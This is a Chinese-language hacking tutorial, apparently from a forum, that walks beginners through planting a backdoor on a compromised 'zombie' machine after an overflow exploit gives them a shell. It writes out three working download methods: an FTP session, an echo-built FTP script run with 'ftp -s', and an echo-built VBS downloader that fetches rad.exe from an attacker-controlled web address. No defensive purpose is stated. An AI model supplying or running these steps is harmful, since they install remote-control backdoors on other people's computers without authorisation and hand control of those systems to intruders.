我们经常利用溢出攻击得到一个shell的但是成功溢出后将不知道怎么上传我们的后门，这是我们菜鸟最头痛的事啦^_*！
呵呵，有什么好办法让我给肉鸡上传后门吗？下面我介绍我常用的三种方法，各有特色哦，在这里我就不讲IPC连接了，
因为很多情况下IPC都不能成功连接，TFTP首先你得拥有一个公网IP，当然这个方法也不是每次都成功的，防火墙和管理
员的防黑设置都能让你的文件传输失败，我也老是上传失败，而且我在网吧就更不好弄了，除非我利用肉鸡。

工具：FtpServer(20cn写的一个FTP服务器小工具,或者用你自己的FTP服务器)
rad.exe 4899自动安装后门软件

1.溢出是给肉鸡加一个账号，再利用opentelnet或其它方法给肉鸡开启telnet仍后直接利用FTP命令下载：
C:\>ftp
ftp> open 192.168.0.1 2121 //我把FTP端口设置了2121
Connected to 192.168.0.1.
220 欢迎你来到NetSeek测试FTP服务器！！！
User (192.168.0.1none)): netseek //输入用户名
331 Password required for netseek
Password: //输入密码，输入时不会显示。
230 User successfully logged in.
ftp> bin //一般下载可执行文件用bin,下载文本文件用ascii
200 Type set to I
ftp> get rad.exe //下载后门到本地当前盘符。
200 Port command successful.
150 Opening BINARY mode data connection for file transfer.
226 Transfer complete
ftp: 350837 bytes received in 0.45Seconds 777.91Kbytes/sec //成功下载啦！
------------------------------------------------------------------------------------------------
2.直接在shell得下写FTP脚本：
echo ftp>ftp.txt
echo open 192.168.0.1 2121>>ftp.txt //ip可以改 port:2121
echo netseek>>ftp.txt
echo cnseek>>ftp.txt
echo bin >>ftp.txt
echo get rad.exe>>ftp.txt
echo bye >>ftp.txt

写好后运行：ftp -s:ftp.txt
-------------------------------------------------------------------------------------------------
3.编写VBS脚本从网站上下载后门：
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >shellget.vbs
echo xPost.Open "GET","http://192.168.0.1/rad.exe",0 >>shellget.vbs
echo xPost.Send() >>shellget.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>shellget.vbs
echo sGet.Mode = 3 >>shellget.vbs
echo sGet.Type = 1 >>shellget.vbs
echo sGet.Open() >>shellget.vbs
echo sGet.Write(xPost.responseBody) >>shellget.vbs
echo sGet.SaveToFile "rad.exe",2 >>shellget.vbs
注：http://192.168.0.1/rad.exe你可以改成你后门的下载地址；存放路径你也可以改。
然后执行cscript shellget.vbs就可以啦

后记：经过试过上面三种方法后，不知道你喜欢用那种方法上传你的后门，如果你有更好的方法希望你能与我共享你的成果。